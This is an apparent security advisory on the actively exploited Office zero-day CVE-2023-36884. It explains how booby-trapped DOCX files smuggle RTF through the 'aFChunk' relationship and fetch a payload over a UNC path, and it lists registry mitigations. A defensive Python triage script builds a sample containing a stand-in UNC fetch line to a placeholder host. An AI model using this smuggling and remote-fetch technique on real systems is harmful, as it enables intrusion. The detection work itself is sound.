Microsoft Office Zero-Day CVE-2023-36884 Exploited in the Wild

Microsoft has issued an advisory disclosing a critical Office and Windows HTML Remote Code Execution vulnerability (CVE-2023-36884) that is being exploited in the wild. The vulnerability is currently being actively exploited by a cybercrime group known as Storm-0978, which has a history of engaging in both cybercrime and espionage activities.
Published on July 25, 2023
Updated on July 25, 2023

Category: Vulnerability Intelligence

Vulnerability Class: Remote Code Execution

CVE ID: CVE-2023-36884

CVSS:3.0 Score: 8.3

Executive Summary

  • Microsoft released an advisory disclosing an in-the-wild exploited Office and Windows HTML Remote Code Execution Vulnerability (CVE-2023-36884).
  • The vulnerability is under active exploitation by the Storm-0978 cybercrime group, which has been observed engaging in both cybercrime and espionage activities.
  • Storm-0978 is known to develop and distribute the RomCom backdoor on its victims’ networks.
  • Microsoft recommends the following mitigations:

    - Block all Office applications from creating child processes
    - Set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.

Analysis

While Microsoft is still investigating the root cause of the vulnerability, the initial study suggests that:

  • Exploitation of CVE-2023-36884 requires the user to open a malicious document.
  • Opening the malicious file leads to the download of a script that performs iframe injection, which in turn downloads the final malicious payload.
  • The chain starts with remotely hosted OOXML files (DOCX and similar formats), which are internally structured as ZIP archives. Within these archives, an XML-based relationship definition file plays a crucial role, and the "aFChunk" relationship in particular. Malicious samples abuse this relationship by embedding RTF files as a means of payload smuggling. The embedded RTF files contain several objects responsible for executing malicious code and ultimately downloading malware. Two objects stand out in the DOCX samples: an OLE1 object and a CFB object, both used to abuse the "URLMoniker" link process.
  • OOXML File Structure:
    - OOXML files, such as DOCX, are structured as ZIP archives, a convenient means of packaging and storing the various components of a document.
  • XML-based Relationship Definition:
    - Within the DOCX file, an XML file serves as the relationship definition, establishing the connections between the different elements of the document.
  • Significance of the "aFChunk" Relationship:
    - Of particular interest is the "aFChunk" relationship defined within the XML file. It enables the embedding of one document within another, creating an avenue for payload smuggling.
  • Malicious Utilization of the "aFChunk" Method:
    - Malicious samples have been observed leveraging the "aFChunk" method to embed RTF files within DOCX files, using it as a vehicle for surreptitious payload delivery.
  • RTF Objects and Malware Payload:
    - Embedded within the RTF files are several objects that carry the code responsible for downloading and executing the malware.
  • OLE1 Object with UNC Path:
    - The first object is an OLE1 object containing a Universal Naming Convention (UNC) path pointing to a remote IP address. Upon execution, this object retrieves a .URL file, for example from a path of the form "\\ip_address\to_evil\payload.url".
  • Exploitation of the "URLMoniker" Link Process:
    - The second object, a CFB object, abuses the "URLMoniker" link process, furthering the malicious activity.

Exploit and infection chain detected by Volexity
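The document structure described above can be triaged statically. The following Python script is an added example (not code from the advisory or from Volexity): it opens an OOXML file as a ZIP, lists any "aFChunk" relationships in its .rels parts, flags parts that are really RTF and scans every part for UNC paths. The sample DOCX it builds is constructed in memory, and the 203.0.113.1 host in it is a TEST-NET placeholder, not an indicator.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Relationship type that Word uses for altChunk (external content chunks, "aFChunk").
AFCHUNK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/aFChunk"
REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
# UNC path: two backslashes, a host, a backslash, then a share/path without whitespace.
UNC_RE = re.compile(rb"\\\\[\w.\-]+\\[^\s\x00}]{1,200}")

def triage_docx(data: bytes) -> dict:
    """Collect aFChunk targets, external relationships, RTF parts and UNC paths from one OOXML file."""
    found = {"afchunk_targets": [], "external_rels": [], "rtf_parts": [], "unc_paths": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith(".rels"):  # relationship definition parts
                for rel in ET.fromstring(blob).iter(REL_TAG):
                    if rel.get("Type") == AFCHUNK_TYPE:
                        found["afchunk_targets"].append(rel.get("Target", ""))
                    if rel.get("TargetMode") == "External":
                        found["external_rels"].append(rel.get("Target", ""))
            if blob.lstrip().startswith(b"{\\rtf"):  # RTF smuggled in as a package part
                found["rtf_parts"].append(name)
            found["unc_paths"] += [m.decode("latin-1") for m in UNC_RE.findall(blob)]
    return found

def is_suspicious(found: dict) -> bool:
    """An aFChunk that pulls in RTF, or a UNC path anywhere in the package, warrants a closer look."""
    return bool(found["afchunk_targets"] and found["rtf_parts"]) or bool(found["unc_paths"])

def build_sample(with_afchunk: bool) -> bytes:
    """Construct a minimal DOCX in memory; optionally add an RTF chunk via an aFChunk relationship."""
    rels = ['<?xml version="1.0"?><Relationships '
            'xmlns="http://schemas.openxmlformats.org/package/2006/relationships">']
    if with_afchunk:
        rels.append(f'<Relationship Id="rId9" Type="{AFCHUNK_TYPE}" Target="afchunk.rtf"/>')
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", "".join(rels))
        if with_afchunk:
            # Constructed RTF stub; the host is a TEST-NET-3 placeholder, not a real indicator.
            z.writestr("word/afchunk.rtf", r"{\rtf1\object\objdata \\203.0.113.1\to_evil\payload.url}")
    return buf.getvalue()

print(is_suspicious(triage_docx(build_sample(True))), triage_docx(build_sample(True)))
```

To run it over a real file, pass `open(path, "rb").read()` to `triage_docx`; a hit on both an aFChunk relationship and an RTF part is the pattern described in the analysis above.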

Mitigation

  • To prevent exploitation of the vulnerability, block all Office applications from creating child processes in endpoint security systems.
  • Set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.
  • No OS restart is required, but restarting the applications that have had the registry key added for them is recommended in case the value was already queried and is cached.
  • Please note that while these registry settings mitigate exploitation of this issue, they could affect regular functionality for certain use cases related to these applications. For this reason, we suggest testing first. To disable the mitigation, delete the registry key or set it to “0”.
  • Registry key: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION
  • Add the following application names to this registry key as values of type REG_DWORD with data 1:
    - Excel.exe
    - Graph.exe
    - MSAccess.exe
    - MSPub.exe
    - PowerPoint.exe
    - Visio.exe
    - WinProj.exe
    - WinWord.exe
    - Wordpad.exe

Screenshot of settings for the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION key


IOCs

